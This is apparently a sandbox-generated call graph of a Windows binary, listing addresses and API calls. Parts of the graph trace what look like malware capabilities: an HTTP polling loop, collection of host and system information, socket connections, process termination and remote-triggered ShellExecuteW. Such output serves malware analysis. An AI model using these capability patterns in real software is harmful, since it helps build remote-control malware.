428a76 LeaveCriticalSection 18882->18876 18885 428ad3 TlsSetValue 18883->18885 18884->18883 18885->18873 18888 40e5b5 RaiseException 18886->18888 18890 4287e6 18889->18890 18891 4287eb EnterCriticalSection 18889->18891 18892 41fa5f ctype RaiseException 18890->18892 18893 42877a 18891->18893 18892->18891 18893->18882 18897 40e11e 18894->18897 18898 40e11b 18897->18898 18900 40e125 ctype 18897->18900 18898->18812 18900->18898 18901 40e14a 18900->18901 18902 40e177 18901->18902 18905 40e1ba 18901->18905 18908 40e1a5 18902->18908 18919 41257d 18902->18919 18904 40e229 RtlAllocateHeap 18915 40e1ac 18904->18915 18905->18908 18909 40e1dc 18905->18909 18906 40e18d 18934 4130e0 18906->18934 18908->18904 18908->18915 18911 41257d ctype 28 API calls 18909->18911 18913 40e1e3 18911->18913 18943 413b83 18913->18943 18915->18900 18916 40e1f6 18950 40e210 18916->18950 18920 4125d3 EnterCriticalSection 18919->18920 18921 412595 18919->18921 18920->18906 18922 40e10c ctype 27 API calls 18921->18922 18923 41259d 18922->18923 18924 4125ab 18923->18924 18925 40d130 ctype 7 API calls 18923->18925 18926 41257d ctype 27 API calls 18924->18926 18925->18924 18927 4125b3 18926->18927 18928 4125c4 18927->18928 18929 4125ba InitializeCriticalSection 18927->18929 18930 40df0d ctype 27 API calls 18928->18930 18931 4125c9 18929->18931 18930->18931 18932 4125de ctype LeaveCriticalSection 18931->18932 18933 4125d1 18932->18933 18933->18920 18937 413112 18934->18937 18935 41349a ctype VirtualAlloc 18936 40e198 18935->18936 18940 40e1b1 18936->18940 18937->18936 18938 4133e9 ctype HeapReAlloc HeapAlloc VirtualAlloc HeapFree 18937->18938 18939 4131b1 18937->18939 18938->18939 18939->18935 18939->18936 18941 4125de ctype LeaveCriticalSection 18940->18941 18942 40e1b8 18941->18942 18942->18908 18948 413b91 ctype 18943->18948 18944 413c7d VirtualAlloc 18949 413c4e ctype 18944->18949 18945 413d52 18946 41388b ctype 5 API calls 18945->18946 18946->18949 18948->18944 18948->18945 18948->18949 18949->18916 18951 4125de ctype LeaveCriticalSection 18950->18951 18952 40e203 18951->18952 18952->18908 18952->18915 18954 41ff7b 18953->18954 18955 41ff75 18953->18955 18957 420e3f ctype 29 API calls 18954->18957 18958 41ff97 ctype 18954->18958 18959 420e68 18955->18959 18957->18958 18958->18817 18962 40df0d 18959->18962 18963 40dfe7 18962->18963 18964 40df3b 18962->18964 18963->18954 18965 40df80 18964->18965 18966 40df45 18964->18966 18969 41257d ctype 28 API calls 18965->18969 18977 40df71 18965->18977 18967 41257d ctype 28 API calls 18966->18967 18971 40df4c ctype 18967->18971 18968 40dfd9 HeapFree 18968->18963 18975 40df8c ctype 18969->18975 18970 40df66 18985 40df77 18970->18985 18971->18970 18979 412db7 18971->18979 18974 40dfb8 18992 40dfcf 18974->18992 18975->18974 18988 413b3e 18975->18988 18977->18963 18977->18968 18981 412df5 18979->18981 18984 4130ab ctype 18979->18984 18980 412ff1 VirtualFree 18982 413055 18980->18982 18981->18980 18981->18984 18983 413064 VirtualFree HeapFree 18982->18983 18982->18984 18983->18984 18984->18970 18986 4125de ctype LeaveCriticalSection 18985->18986 18987 40df7e 18986->18987 18987->18977 18989 413b6b 18988->18989 18991 413b81 18988->18991 18990 413a25 ctype VirtualFree HeapFree VirtualFree 18989->18990 18989->18991 18990->18991 18991->18974 18993 4125de ctype LeaveCriticalSection 18992->18993 18994 40dfd6 18993->18994 18994->18977 19016 424202 18995->19016 18997 42191a 18997->18791 19019 421b9c 18998->19019 19000 421b04 19000->18795 19003 421924 19000->19003 19004 421931 19003->19004 19005 421998 19003->19005 19006 424202 GetWindowLongW 19004->19006 19005->18795 19007 42193b 19006->19007 19007->19005 19008 421942 GetWindowRect 19007->19008 19008->19005 19009 421959 19008->19009 19009->19005 19010 421961 GetWindow 19009->19010 19029 421c35 19010->19029 19013 42197d 19013->19005 19039 4238e8 19013->19039 19017 424215 19016->19017 19018 424209 GetWindowLongW 19016->19018 19018->18997 19020 428c05 ctype 21 API calls 19019->19020 19021 421bae 19020->19021 19023 422460 2 API calls 19021->19023 19022 421bc1 19022->19000 19024 422460 19022->19024 19023->19022 19025 42248f CallWindowProcW 19024->19025 19026 42246d 19024->19026 19027 4224a2 19025->19027 19026->19025 19028 42247b DefWindowProcW 19026->19028 19027->19000 19028->19027 19030 421bc3 ctype 57 API calls 19029->19030 19031 421c3e 19030->19031 19069 424f58 19031->19069 19033 421c4b 19075 42443b 19033->19075 19035 421972 19035->19013 19036 42438f 19035->19036 19037 4243a0 19036->19037 19038 424396 IsWindowEnabled 19036->19038 19038->19013 19040 424202 GetWindowLongW 19039->19040 19041 4238fb 19040->19041 19042 423905 19041->19042 19044 423910 GetParent 19041->19044 19045 42391b GetWindow 19041->19045 19043 423942 GetWindowRect 19042->19043 19046 4239e6 GetParent GetClientRect GetClientRect MapWindowPoints 19043->19046 19047 42395b 19043->19047 19048 423926 19044->19048 19045->19048 19059 423a13 19046->19059 19049 42396f 19047->19049 19050 42395f GetWindowLongW 19047->19050 19048->19043 19051 42392c SendMessageW 19048->19051 19052 423983 19049->19052 19053 4239bd GetWindowRect 19049->19053 19050->19049 19051->19043 19054 423940 19051->19054 19092 405110 19052->19092 19055 405b9b 14 API calls 19053->19055 19054->19043 19057 4239d0 19055->19057 19060 405c06 12 API calls 19057->19060 19064 424319 SetWindowPos 19059->19064 19062 4239d6 CopyRect 19060->19062 19062->19059 19066 423a96 19064->19066 19066->19005 19070 424f62 __EH_prolog ctype 19069->19070 19071 424fd7 19070->19071 19073 41fa5f ctype RaiseException 19070->19073 19074 424f73 ctype 19070->19074 19079 4200ce 19071->19079 19073->19071 19074->19033 19076 424442 19075->19076 19078 42445e ctype 19075->19078 19077 424448 GetParent 19076->19077 19076->19078 19077->19078 19078->19035 19082 4200e2 19079->19082 19080 4200fe 19080->19074 19081 4200f7 19085 420003 19081->19085 19082->19080 19082->19081 19083 41ff6a ctype 29 API calls 19082->19083 19083->19081 19086 42001a 19085->19086 19087 42000c 19085->19087 19086->19080 19089 41fef1 19087->19089 19090 420e3f ctype 29 API calls 19089->19090 19091 41ff03 19090->19091 19091->19086 19115 4203c0 19092->19115 19095 405b9b 19120 405a6d 19095->19120 19098 405bb8 19100 405bc5 IsIconic 19098->19100 19105 405bbe 19098->19105 19099 405baa MonitorFromWindow 19099->19105 19101 405be1 GetWindowRect 19100->19101 19102 405bd2 GetWindowPlacement 19100->19102 19103 405bee 19101->19103 19102->19103 19103->19105 19129 405b45 19103->19129 19106 405c06 19105->19106 19107 405a6d 7 API calls 19106->19107 19108 405c13 19107->19108 19109 405c17 GetMonitorInfoW 19108->19109 19111 405c25 19108->19111 19110 405c8d CopyRect CopyRect 19109->19110 19110->19059 19111->19110 19112 405c3c SystemParametersInfoW 19111->19112 19112->19110 19113 405c4e GetSystemMetrics GetSystemMetrics 19112->19113 19113->19110 19114 405c7e lstrcpyW 19113->19114 19114->19110 19116 428414 ctype 28 API calls 19115->19116 19117 4203c5 19116->19117 19118 405115 19117->19118 19119 4283ee ctype 28 API calls 19117->19119 19118->19095 19119->19118 19121 405a8a GetModuleHandleW 19120->19121 19122 405a7a 19120->19122 19121->19122 19123 405a9b GetProcAddress 19121->19123 19122->19098 19122->19099 19123->19122 19124 405ab2 GetProcAddress 19123->19124 19124->19122 19125 405ac3 GetProcAddress 19124->19125 19125->19122 19126 405ad4 GetProcAddress 19125->19126 19126->19122 19127 405ae5 GetProcAddress 19126->19127 19127->19122 19128 405af6 GetProcAddress 19127->19128 19128->19122 19130 405a6d 7 API calls 19129->19130 19131 405b4c 19130->19131 19132 405b60 19131->19132 19133 405b50 MonitorFromRect 19131->19133 19134 405b8d 19132->19134 19135 405b77 GetSystemMetrics 19132->19135 19133->19134 19134->19105 19135->19134 19136 405b84 GetSystemMetrics 19135->19136 19136->19134 19138 428c05 ctype 21 API calls 19137->19138 19139 4215c8 19138->19139 19139->18679 19139->18684 19141 424b6b __EH_prolog 19140->19141 19142 428414 ctype 28 API calls 19141->19142 19143 424b71 ctype 19142->19143 19144 420e3f ctype 29 API calls 19143->19144 19146 424baf ctype 19143->19146 19145 424b93 19144->19145 19145->19146 19147 424ef3 ctype 29 API calls 19145->19147 19146->18693 19147->19146 19149 4248c5 19148->19149 19150 4248ba lstrlenA 19148->19150 19160 424710 19149->19160 19150->19149 19154 4248d9 19171 424a36 19154->19171 19157 41f9b6 19158 4246df 34 API calls 19157->19158 19159 4046a5 WideCharToMultiByte 19158->19159 19159->18701 19161 424720 19160->19161 19162 424734 19161->19162 19176 42466d 19161->19176 19166 424a80 19162->19166 19167 424a94 MultiByteToWideChar 19166->19167 19168 424a8c 19166->19168 19170 424aad 19167->19170 19168->19167 19169 424a90 19168->19169 19169->19154 19170->19154 19207 4246df 19171->19207 19173 424a3e 19174 424a47 lstrlenW 19173->19174 19175 40469a 19173->19175 19174->19175 19175->19157 19177 424695 19176->19177 19178 42467d InterlockedDecrement 19176->19178 19181 4245a1 19177->19181 19178->19177 19179 42468b 19178->19179 19188 424625 19179->19188 19182 4245ad 19181->19182 19184 4245b6 19181->19184 19182->19162 19183 4245be 19199 40cc20 19183->19199 19184->19183 19186 4245fd 19184->19186 19187 420e3f ctype 29 API calls 19186->19187 19187->19182 19189 424639 19188->19189 19190 42462d 19188->19190 19189->19190 19193 424666 19189->19193 19196 40ccaf 19190->19196 19194 420e68 ctype 29 API calls 19193->19194 19195 42466b 19194->19195 19195->19177 19197 40ccd6 19196->19197 19198 40ccbb EnterCriticalSection LeaveCriticalSection 19196->19198 19197->19177 19198->19197 19206 40dec0 19199->19206 19201 40cc2a EnterCriticalSection 19202 40cc48 19201->19202 19203 40cc79 LeaveCriticalSection 19201->19203 19204 41fef1 ctype 29 API calls 19202->19204 19203->19182 19205 40cc5a 19204->19205 19205->19203 19206->19201 19208 4246eb 19207->19208 19212 4246fa ctype 19207->19212 19209 42466d ctype 32 API calls 19208->19209 19210 4246f0 19209->19210 19211 4245a1 ctype 31 API calls 19210->19211 19211->19212 19212->19173 19216 42187e GetWindowLongW 19213->19216 19217 42189b 19216->19217 19218 42189f SetWindowLongW 19216->19218 19217->18715 19218->19217 19219 4218b5 SetWindowPos 19218->19219 19219->19217 19221 4283ee ctype 28 API calls 19220->19221 19222 424b3f LoadStringW 19221->19222 19223 424ad8 19222->19223 19223->18723 19223->18724 19225 424892 19224->19225 19226 424896 lstrlenW 19224->19226 19235 424803 19225->19235 19226->19225 19228 4248a6 19228->18727 19230 4249f9 19229->19230 19231 424a2e 19230->19231 19232 4245a1 ctype 31 API calls 19230->19232 19231->18724 19233 424a10 ctype 19232->19233 19238 42469e 19233->19238 19236 424710 ctype 34 API calls 19235->19236 19237 424812 ctype 19236->19237 19237->19228 19239 4246ab InterlockedDecrement 19238->19239 19240 4246bd 19238->19240 19239->19240 19241 4246b6 19239->19241 19240->19231 19242 424625 ctype 31 API calls 19241->19242 19242->19240 19244 401551 19243->19244 19245 401539 GetProcAddress FreeLibrary 19243->19245 19246 401559 19244->19246 19247 401c07 14 API calls 19244->19247 19245->19244 19248 401d0a 19247->19248 19271 405040 GetCommandLineW 19248->19271 19255 401da1 InternetOpenA 19256 401dd0 InternetConnectA 19255->19256 19257 401dc3 Sleep 19255->19257 19258 401dfe HttpOpenRequestA 19256->19258 19259 401dee InternetCloseHandle Sleep 19256->19259 19257->19255 19260 401e25 InternetCloseHandle InternetCloseHandle Sleep 19258->19260 19261 401e3b InternetSetOptionA 19258->19261 19259->19255 19260->19255 19262 401e4e Sleep WaitForSingleObject ResetEvent 19261->19262 19317 40d60e 19262->19317 19265 401ee9 HttpAddRequestHeadersA HttpSendRequestA 19266 401f2c InternetReadFile 19265->19266 19267 401f5e GetLastError 19266->19267 19270 401f4f 19266->19270 19268 401f64 SetEvent 19267->19268 19268->19262 19268->19270 19270->19262 19270->19266 19270->19268 19322 401ff0 19270->19322 19272 424886 ctype 35 API calls 19271->19272 19273 405078 19272->19273 19274 41f9b6 34 API calls 19273->19274 19275 405083 19274->19275 19423 40d7c2 19275->19423 19278 4050a1 19426 40da67 19278->19426 19281 4050ab 19282 420e3f ctype 29 API calls 19281->19282 19283 4050b3 19282->19283 19444 40dc44 19283->19444 19288 424739 ctype 32 API calls 19289 401d0f 19288->19289 19290 403190 19289->19290 19291 401d19 19290->19291 19292 4031ab GetComputerNameW 19290->19292 19312 403d20 GetLogicalDrives 19291->19312 19293 403230 19292->19293 19294 403238 gethostname gethostbyname 19292->19294 19293->19294 19295 403277 19294->19295 19296 4032df timeGetTime 19294->19296 19297 40d60e 48 API calls 19295->19297 19298 40d60e 48 API calls 19296->19298 19299 4032be 19297->19299 19300 403351 19298->19300 19860 403550 GetAdaptersInfo 19299->19860 19300->19291 19301 403373 GetVersionExW 19300->19301 19303 4033b0 19301->19303 19304 403399 GetVersionExW 19301->19304 19306 403458 GetSystemMetrics 19303->19306 19310 4033bd 19303->19310 19304->19291 19304->19303 19309 403473 19306->19309 19306->19310 19307 40d60e 48 API calls 19308 403513 19307->19308 19308->19291 19309->19310 19311 40348c GetSystemMetrics 19309->19311 19310->19307 19311->19310 19313 401d37 CreateThread CreateThread CreateThread CreateThread 19312->19313 19316 403d4e 19312->19316 19313->19255 20259 403c80 19313->20259 20265 404150 VirtualAlloc VirtualAlloc 19313->20265 20283 401130 19313->20283 20285 402ba0 19313->20285 19314 40d60e 48 API calls 19315 403d72 GetDriveTypeA 19314->19315 19315->19316 19316->19313 19316->19314 19867 4110eb 19317->19867 19321 40d646 19321->19265 19323 402020 19322->19323 19324 402117 19323->19324 19325 402058 timeGetTime 19323->19325 19326 4021a2 19324->19326 19327 40212e 19324->19327 19328 40d60e 48 API calls 19325->19328 19329 40219a 19326->19329 19330 4021b8 timeGetTime 19326->19330 19331 420e3f ctype 29 API calls 19327->19331 19332 4020b4 19328->19332 19338 40243b 19329->19338 19339 40229d 19329->19339 19411 40256e 19329->19411 19333 40d60e 48 API calls 19330->19333 19334 402138 19331->19334 19335 420e3f ctype 29 API calls 19332->19335 19336 40220e 19333->19336 19337 402f20 6 API calls 19334->19337 19341 4020be 19335->19341 19342 420e3f ctype 29 API calls 19336->19342 19344 402194 19337->19344 19343 4024f6 19338->19343 19369 402451 19338->19369 19340 402379 19339->19340 19346 420e3f ctype 29 API calls 19339->19346 19357 40238c connect 19340->19357 19358 40240f 19340->19358 19375 4023cc 19340->19375 19901 402f20 19341->19901 19350 402218 19342->19350 19347 402576 19343->19347 19348 402508 19343->19348 19345 420e68 ctype 29 API calls 19344->19345 19345->19329 19352 4022c8 WSAStartup htons inet_addr 19346->19352 19364 4025b1 19347->19364 19365 4025a7 19347->19365 19347->19411 19353 402f20 6 API calls 19348->19353 19355 402f20 6 API calls 19350->19355 19351 40249e 19356 4024ce 19351->19356 19359 4024ae CreateThread 19351->19359 19361 402327 gethostbyname 19352->19361 19362 402319 inet_addr 19352->19362 19353->19411 19368 40226b 19355->19368 19360 4024d8 closesocket 19356->19360 19356->19411 19366 4023a5 CreateThread Sleep 19357->19366 19357->19375 19367 402419 closesocket 19358->19367 19358->19411 19359->19356 20235 404ad0 19359->20235 19360->19411 19370 402342 19361->19370 19371 402338 WSAGetLastError 19361->19371 19362->19370 19363 420e68 ctype 29 API calls 19363->19324 19373 4025c3 19364->19373 19374 4025f6 19364->19374 19908 403a00 19365->19908 19366->19375 20206 4048d0 19366->20206 19367->19411 19377 420e68 ctype 29 API calls 19368->19377 19369->19351 19369->19356 19378 402488 send 19369->19378 19370->19340 19379 402368 socket 19370->19379 19371->19370 19380 4025ce OpenProcess 19373->19380 19373->19411 19381 402608 19374->19381 19382 40264f 19374->19382 19375->19358 19376 4023fb send 19375->19376 19376->19358 19377->19329 19378->19351 19379->19340 19383 4025e2 TerminateProcess CloseHandle 19380->19383 19380->19411 19384 402611 CreateThread 19381->19384 19389 402647 19381->19389 19393 40263b Sleep 19381->19393 19385 402700 19382->19385 19386 402665 19382->19386 19383->19411 19384->19411 20216 403db0 19384->20216 19387 402760 19385->19387 19388 402712 19385->19388 19390 402691 19386->19390 19398 402684 Sleep 19386->19398 19386->19411 19392 402878 19387->19392 19409 402776 19387->19409 19953 4036e0 19388->19953 19389->19384 19390->19411 19931 40d7d5 19390->19931 19396 4029a1 19392->19396 19397 40288e 19392->19397 19393->19389 19393->19393 19395 40285f 19399 424739 ctype 32 API calls 19395->19399 19401 4029c1 19396->19401 19402 4029b3 19396->19402 19400 402988 19397->19400 19410 424886 ctype 35 API calls 19397->19410 19416 424992 35 API calls 19397->19416 19398->19386 19398->19390 19399->19411 19406 424739 ctype 32 API calls 19400->19406 19403 4029e1 19401->19403 19404 4029d3 19401->19404 19994 402fb0 19402->19994 19403->19411 19412 40d7c2 66 API calls 19403->19412 20015 402ad0 WaitForSingleObject ResetEvent 19404->20015 19405 424886 ctype 35 API calls 19405->19409 19406->19411 19409->19395 19409->19405 19989 424992 19409->19989 19410->19397 19411->19270 19414 402a42 19412->19414 19417 402a5e 19414->19417 20018 40d6dd 19414->20018 19418 402965 ShellExecuteW 19416->19418 19421 402f20 6 API calls 19417->19421 19418->19397 19418->19400 19421->19411 19422 40d660 49 API calls 19422->19417 19462 40d791 19423->19462 19425 405092 19425->19278 19459 40dd88 19425->19459 19427 40da74 19426->19427 19428 40dad9 19426->19428 19427->19428 19430 40da8f 19427->19430 19429 40f92e 35 API calls 19428->19429 19431 40dade 19429->19431 19432 411ef7 31 API calls 19430->19432 19433 40f937 35 API calls 19431->19433 19434 40da97 19432->19434 19435 40dae9 19433->19435 19436 412848 37 API calls 19434->19436 19435->19281 19437 40daa1 19436->19437 19438 40dac9 19437->19438 19439 412848 37 API calls 19437->19439 19775 411f56 LeaveCriticalSection 19438->19775 19441 40dab7 19439->19441 19441->19438 19443 412848 37 API calls 19441->19443 19442 40dad2 19442->19281 19443->19438 19776 4119b1 19444->19776 19446 40dc50 19782 40dc73 19446->19782 19449 411a03 2 API calls 19450 4050bd 19449->19450 19451 40d660 19450->19451 19452 40d675 19451->19452 19453 4050c3 19451->19453 19454 4119b1 30 API calls 19452->19454 19453->19288 19455 40d67b 19454->19455 19811 40d691 19455->19811 19458 411a03 2 API calls 19458->19453 19844 40ddaa 19459->19844 19470 412173 19462->19470 19465 40d79d 19465->19425 19469 40d7ba 19469->19425 19471 41257d ctype 29 API calls 19470->19471 19480 412181 19471->19480 19472 4121cc 19492 4125de LeaveCriticalSection 19472->19492 19473 4121d3 19476 40e10c ctype 29 API calls 19473->19476 19475 40d797 19475->19465 19482 411ffd 19475->19482 19478 4121dd 19476->19478 19478->19472 19479 4121f3 InitializeCriticalSection EnterCriticalSection 19478->19479 19479->19472 19480->19472 19480->19473 19493 4119e0 19480->19493 19498 411a32 19480->19498 19483 41201d 19482->19483 19484 40d7b2 19483->19484 19504 4158e8 19483->19504 19486 411a03 19484->19486 19487 411a10 19486->19487 19488 411a27 LeaveCriticalSection 19486->19488 19487->19488 19489 411a17 19487->19489 19488->19469 19774 4125de LeaveCriticalSection 19489->19774 19491 411a25 19491->19469 19492->19475 19494 4119f4 EnterCriticalSection 19493->19494 19495 4119e9 19493->19495 19494->19480 19496 41257d ctype 29 API calls 19495->19496 19497 4119f2 19496->19497 19497->19480 19499 411a46 LeaveCriticalSection 19498->19499 19500 411a3b 19498->19500 19499->19480 19503 4125de LeaveCriticalSection 19500->19503 19502 411a44 19502->19480 19503->19502 19509 415905 19504->19509 19505 4159ec 19588 40f92e 19505->19588 19509->19505 19510 4159c1 19509->19510 19540 411c97 19510->19540 19513 415a88 CreateFileW 19516 415aa7 GetLastError 19513->19516 19517 415abb GetFileType 19513->19517 19514 415a6e 19515 40f92e 35 API calls 19514->19515 19520 415a73 19515->19520 19594 40f8bb 19516->19594 19518 415ac6 CloseHandle 19517->19518 19519 415acf 19517->19519 19518->19516 19555 411dba 19519->19555 19522 40f937 35 API calls 19520->19522 19525 4159fc 19522->19525 19525->19484 19529 415b51 19611 412ae6 19529->19611 19530 415b38 19532 40f937 35 API calls 19530->19532 19534 415b3d 19532->19534 19538 415ab3 19534->19538 19574 411a55 19534->19574 19535 415b78 19535->19534 19537 412848 37 API calls 19535->19537 19537->19534 19655 411f56 LeaveCriticalSection 19538->19655 19541 41257d ctype 29 API calls 19540->19541 19542 411ca7 19541->19542 19543 411d5b 19542->19543 19545 411d59 19542->19545 19546 411cfb EnterCriticalSection 19542->19546 19549 41257d ctype 29 API calls 19542->19549 19553 411ce6 InitializeCriticalSection 19542->19553 19657 4125de LeaveCriticalSection 19542->19657 19544 40e10c ctype 29 API calls 19543->19544 19550 411d66 19544->19550 19656 4125de LeaveCriticalSection 19545->19656 19546->19542 19551 411d0b LeaveCriticalSection 19546->19551 19548 411db0 19548->19513 19548->19514 19549->19542 19550->19545 19658 411ef7 19550->19658 19551->19542 19553->19542 19556 411dc8 19555->19556 19557 411e1d 19555->19557 19556->19557 19563 411de7 19556->19563 19558 40f92e 35 API calls 19557->19558 19559 411e22 19558->19559 19561 40f937 35 API calls 19559->19561 19560 411e13 19560->19538 19564 412848 19560->19564 19561->19560 19562 411e0d SetStdHandle 19562->19560 19563->19560 19563->19562 19668 411eb5 19564->19668 19566 412854 19567 412867 SetFilePointer 19566->19567 19568 41285a 19566->19568 19570 412887 19567->19570 19571 41287f GetLastError 19567->19571 19569 40f92e 35 API calls 19568->19569 19572 41285f 19569->19572 19570->19572 19573 40f8bb 35 API calls 19570->19573 19571->19570 19572->19529 19572->19530 19573->19572 19575 411a62 19574->19575 19576 411a9a 19574->19576 19575->19576 19578 411a7d 19575->19578 19577 40f92e 35 API calls 19576->19577 19579 411a9f 19577->19579 19580 411ef7 31 API calls 19578->19580 19581 40f937 35 API calls 19579->19581 19582 411a84 19580->19582 19583 411aaa 19581->19583 19675 411ab2 19582->19675 19583->19538 19587 411a92 19587->19538 19700 41020f GetLastError TlsGetValue 19588->19700 19590 40f933 19591 40f937 19590->19591 19592 41020f 35 API calls 19591->19592 19593 40f93c 19592->19593 19593->19525 19595 40f937 35 API calls 19594->19595 19596 40f8c1 19595->19596 19597 40f8f4 19596->19597 19598 40f8dd 19596->19598 19599 40f92e 35 API calls 19597->19599 19600 40f904 19598->19600 19602 40f8e7 19598->19602 19601 40f8f9 19599->19601 19603 40f921 19600->19603 19605 40f914 19600->19605 19601->19538 19604 40f92e 35 API calls 19602->19604 19606 40f92e 35 API calls 19603->19606 19607 40f8ec 19604->19607 19608 40f92e 35 API calls 19605->19608 19609 40f926 19606->19609 19607->19538 19610 40f919 19608->19610 19609->19538 19610->19538 19613 412b02 19611->19613 19621 412b87 19611->19621 19612 412b51 ReadFile 19614 412b6a GetLastError 19612->19614 19624 412ba3 19612->19624 19613->19612 19613->19621 19615 412b77 19614->19615 19616 412b8b 19614->19616 19617 40f92e 35 API calls 19615->19617 19619 40f8bb 35 API calls 19616->19619 19616->19621 19618 412b7c 19617->19618 19620 40f937 35 API calls 19618->19620 19619->19621 19620->19621 19621->19535 19627 416b1a 19621->19627 19622 412c1c ReadFile 19623 412c3a GetLastError 19622->19623 19625 412c44 19622->19625 19623->19625 19624->19621 19624->19622 19625->19624 19626 412848 37 API calls 19625->19626 19626->19625 19628 416b27 19627->19628 19629 412848 37 API calls 19628->19629 19630 416b36 19629->19630 19631 412848 37 API calls 19630->19631 19639 416c31 19630->19639 19632 416b52 19631->19632 19633 416b67 ctype 19632->19633 19635 416bdc 19632->19635 19632->19639 19747 417843 19633->19747 19634 416bd8 19636 412848 37 API calls 19634->19636 19635->19634 19637 412848 37 API calls 19635->19637 19636->19639 19640 416beb 19637->19640 19639->19535 19641 411eb5 35 API calls 19640->19641 19642 416bf3 SetEndOfFile 19641->19642 19642->19634 19643 416c0a 19642->19643 19644 40f92e 35 API calls 19643->19644 19646 416c0f GetLastError 19644->19646 19648 40f937 35 API calls 19646->19648 19647 416b87 19649 416bb5 19647->19649 19651 416bc4 19647->19651 19752 412658 19647->19752 19648->19634 19650 40f937 35 API calls 19649->19650 19652 416bba 19650->19652 19653 417843 35 API calls 19651->19653 19652->19651 19654 40f92e 35 API calls 19652->19654 19653->19634 19654->19651 19655->19525 19656->19548 19657->19542 19659 411f22 19658->19659 19660 411f45 EnterCriticalSection 19658->19660 19661 41257d ctype 29 API calls 19659->19661 19660->19545 19662 411f29 19661->19662 19663 411f30 InitializeCriticalSection 19662->19663 19664 411f3d 19662->19664 19663->19664 19667 4125de LeaveCriticalSection 19664->19667 19666 411f44 19666->19660 19667->19666 19669 411ec1 19668->19669 19670 411edd 19669->19670 19671 40f92e 35 API calls 19669->19671 19670->19566 19672 411ee5 19671->19672 19673 40f937 35 API calls 19672->19673 19674 411ef0 19673->19674 19674->19566 19676 411eb5 35 API calls 19675->19676 19677 411abe 19676->19677 19678 411b00 19677->19678 19680 411eb5 35 API calls 19677->19680 19689 411ade 19677->19689 19691 411e36 19678->19691 19683 411ad5 19680->19683 19681 411eb5 35 API calls 19684 411aea CloseHandle 19681->19684 19685 411eb5 35 API calls 19683->19685 19684->19678 19686 411af6 GetLastError 19684->19686 19685->19689 19686->19678 19687 40f8bb 35 API calls 19688 411a8a 19687->19688 19690 411f56 LeaveCriticalSection 19688->19690 19689->19678 19689->19681 19690->19587 19692 411e44 19691->19692 19693 411e9c 19691->19693 19692->19693 19698 411e6a 19692->19698 19694 40f92e 35 API calls 19693->19694 19695 411ea1 19694->19695 19697 40f937 35 API calls 19695->19697 19696 411b08 19696->19687 19696->19688 19697->19696 19698->19696 19699 411e8c SetStdHandle 19698->19699 19699->19696 19701 41022b 19700->19701 19702 41026a SetLastError 19700->19702 19711 413f58 19701->19711 19702->19590 19705 410262 19720 40d130 19705->19720 19706 41023c TlsSetValue 19706->19705 19707 41024d 19706->19707 19710 410253 GetCurrentThreadId 19707->19710 19710->19702 19712 413f8d ctype 19711->19712 19713 414045 HeapAlloc 19712->19713 19714 41257d 29 API calls ctype 19712->19714 19715 410234 19712->19715 19716 4130e0 ctype 5 API calls 19712->19716 19717 413b83 ctype 6 API calls 19712->19717 19726 413ff1 19712->19726 19729 41407a 19712->19729 19713->19712 19714->19712 19715->19705 19715->19706 19716->19712 19717->19712 19721 40d139 19720->19721 19722 40d13e 19720->19722 19732 410528 19721->19732 19738 410561 19722->19738 19727 4125de ctype LeaveCriticalSection 19726->19727 19728 413ff8 19727->19728 19728->19712 19730 4125de ctype LeaveCriticalSection 19729->19730 19731 414081 19730->19731 19731->19712 19733 410532 19732->19733 19734 41055f 19733->19734 19735 410561 ctype 7 API calls 19733->19735 19734->19722 19736 410549 19735->19736 19737 410561 ctype 7 API calls 19736->19737 19737->19734 19740 410574 19738->19740 19739 40d147 19739->19702 19740->19739 19741 41068b ctype 19740->19741 19742 4105b4 19740->19742 19744 41069e GetStdHandle WriteFile 19741->19744 19742->19739 19743 4105c0 GetModuleFileNameA 19742->19743 19745 4105d8 ctype 19743->19745 19744->19739 19746 4154a8 ctype LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 19745->19746 19746->19739 19748 417874 19747->19748 19749 417879 19747->19749 19748->19647 19749->19748 19750 40f92e 35 API calls 19749->19750 19751 417899 19750->19751 19751->19647 19753 412671 19752->19753 19754 412678 19752->19754 19753->19647 19755 4126a5 19754->19755 19756 412848 37 API calls 19754->19756 19757 412777 WriteFile 19755->19757 19758 4126b6 19755->19758 19756->19755 19759 412799 GetLastError 19757->19759 19762 41273e 19757->19762 19760 4127b2 19758->19760 19761 412702 WriteFile 19758->19761 19758->19762 19759->19762 19760->19753 19763 40f92e 35 API calls 19760->19763 19761->19758 19764 41276c GetLastError 19761->19764 19762->19753 19762->19760 19765 412750 19762->19765 19766 4127cc 19763->19766 19764->19762 19767 4127a4 19765->19767 19768 412758 19765->19768 19769 40f937 35 API calls 19766->19769 19770 40f8bb 35 API calls 19767->19770 19771 40f92e 35 API calls 19768->19771 19769->19753 19770->19753 19772 41275d 19771->19772 19773 40f937 35 API calls 19772->19773 19773->19753 19774->19491 19775->19442 19777 4119d5 EnterCriticalSection 19776->19777 19778 4119be 19776->19778 19777->19446 19778->19777 19779 4119c5 19778->19779 19780 41257d ctype 29 API calls 19779->19780 19781 4119d3 19780->19781 19781->19446 19785 40dc97 ctype 19782->19785 19786 40dc61 19782->19786 19785->19786 19787 412a81 19785->19787 19801 4129a5 19785->19801 19786->19449 19788 412ace 19787->19788 19789 412a8e 19787->19789 19791 40f92e 35 API calls 19788->19791 19789->19788 19790 412aa9 19789->19790 19792 411ef7 31 API calls 19790->19792 19793 412ad3 19791->19793 19795 412ab0 19792->19795 19794 40f937 35 API calls 19793->19794 19796 412ade 19794->19796 19797 412ae6 41 API calls 19795->19797 19796->19785 19798 412abe 19797->19798 19807 411f56 LeaveCriticalSection 19798->19807 19800 412ac6 19800->19785 19802 4129b5 19801->19802 19806 4129c1 19801->19806 19803 4129dc 19802->19803 19802->19806 19808 4156a5 19802->19808 19805 412a81 44 API calls 19803->19805 19805->19806 19806->19785 19807->19800 19809 40e10c ctype 29 API calls 19808->19809 19810 4156b5 19809->19810 19810->19803 19812 40d6a0 19811->19812 19819 40d681 19811->19819 19821 411b8e 19812->19821 19817 411a55 41 API calls 19818 40d6b6 19817->19818 19818->19819 19820 40df0d ctype 29 API calls 19818->19820 19819->19458 19820->19819 19822 411ba4 19821->19822 19824 40d6a6 19821->19824 19822->19824 19829 4125f3 19822->19829 19825 411b35 19824->19825 19826 411b41 19825->19826 19827 40d6ae 19825->19827 19826->19827 19828 40df0d ctype 29 API calls 19826->19828 19827->19817 19828->19827 19830 412640 19829->19830 19831 412600 19829->19831 19833 40f92e 35 API calls 19830->19833 19831->19830 19832 41261b 19831->19832 19834 411ef7 31 API calls 19832->19834 19835 412645 